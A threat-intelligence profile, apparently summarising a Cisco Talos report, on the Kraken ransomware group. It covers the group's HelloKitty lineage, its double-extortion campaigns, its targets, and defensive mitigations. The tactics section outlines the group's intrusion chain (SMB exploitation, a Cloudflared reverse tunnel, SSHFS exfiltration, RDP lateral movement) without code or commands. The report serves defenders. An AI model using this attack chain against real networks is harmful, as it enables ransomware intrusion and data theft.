Full Report
In August 2025, Cisco Talos observed big-game hunting and double extortion attacks carried out by Kraken, a Russian-speaking group that has emerged from the remnants of the HelloKitty ransomware cartel.
Analysis Summary
# Threat Actor: Kraken
## Attribution & Identity
**Identification:** Kraken is a Russian-speaking ransomware group observed conducting big-game hunting operations.
**Aliases and Associations:** Suspected to have emerged from the remnants or former members of the **HelloKitty ransomware cartel**. The Kraken leak site explicitly references HelloKitty, and both groups share the same ransom note filename. Collaboration with the HelloKitty team was also hinted at in the announcement of their new forum, "The Last Haven Board."
## Activity Summary
Kraken was observed in **August 2025** engaging in big-game hunting and double extortion attacks. The group emerged in **February 2025** and employs a double extortion technique. In September 2025, Kraken announced the creation of a new underground forum, "The Last Haven Board," intended to be a secure communication channel for the cybercrime underground, which also announced support from the HelloKitty team and WeaCorp. Ransom demands observed were as high as **1 million USD** payable in Bitcoin.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploiting **Server Message Block (SMB) vulnerabilities** on internet-exposed servers.
- **Credential Access:** Extracting valid **administrator and other privileged account credentials**.
- **Persistence:** Establishing persistent connections using tools like **Cloudflared** to configure a reverse tunnel.
- **Exfiltration:** Utilizing **SSH Filesystem (SSHFS)** for data exfiltration.
- **Lateral Movement:** Moving laterally using **Remote Desktop Protocol (RDP)** connections with stolen privileged accounts to deploy ransomware binaries across multiple systems.
- **Encryption:** Deploying cross-platform ransomware binaries targeting **Windows, Linux, and VMware ESXi**.
- Encrypted files use the **.zpsc** file extension.
- Ransom note is titled: **readme\_you\_ws\_hacked.txt**.
- The ransomware performs a **benchmarking** process on the victim machine before encryption begins.
- **Extortion:** Employing **double extortion** tactics, operating a data leak site to publicly shame victims who do not meet ransom demands.
- **MITRE ATT&CK IDs:** (Not explicitly provided in the text, but techniques align with TA0001 Initial Access, TA0006 Credential Access, TA0008 Lateral Movement, and T1486 Data Encrypted for Impact).
## Targeting
- **Sectors:** Opportunistic; has not concentrated on any specific verticals.
- **Geography:** Spans various geographies, including the **United States, the United Kingdom, Canada, Denmark, Panama, and Kuwait**.
- **Victims:** Enterprise environments; specific organizations were not named in the summary text.
## Tools & Infrastructure
- **Malware Families Used:** Kraken ransomware (cross-platform variants for Windows, Linux, ESXi).
- **Tools Used:** **Cloudflared** (for persistence/reverse tunnel), **SSHFS** (for data exfiltration).
- **Infrastructure:** Threat actor instructs victims to contact them via an **onion URL** (defanged due to lack of specific address). Operates a data leak blog/site.
## Implications
Kraken represents a continuation of sophisticated ransomware operations, likely leveraging expertise from the defunct HelloKitty cartel. Their multi-platform ransomware capability (Windows, Linux, ESXi) and focus on big-game hunting indicate a high threat level against diverse enterprise environments. Their use of advanced staging techniques like Cloudflared for persistent remote access complicates defensive remediation.
## Mitigations
- Implement robust security monitoring, potentially utilizing solutions like Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) to analyze network traffic for unwanted activity.
- Utilize security solutions like Cisco Secure Malware Analytics (Threat Grid) to identify and build protection against malicious binaries.
- Apply strong Zero Trust principles using solutions like Cisco Secure Access to enforce strict access controls.
- Deploy secure internet gateways (e.g., Cisco Umbrella) to block connections to malicious domains, IPs, and URLs.
- Ensure Multi-Factor Authentication (MFA) is enforced using solutions like Cisco Duo to prevent unauthorized access via stolen credentials.
- Keep systems patched, especially addressing known **SMB vulnerabilities** exploited for initial access.
- Deploy defenses based on provided Snort SIDs: **65480 and 65479**.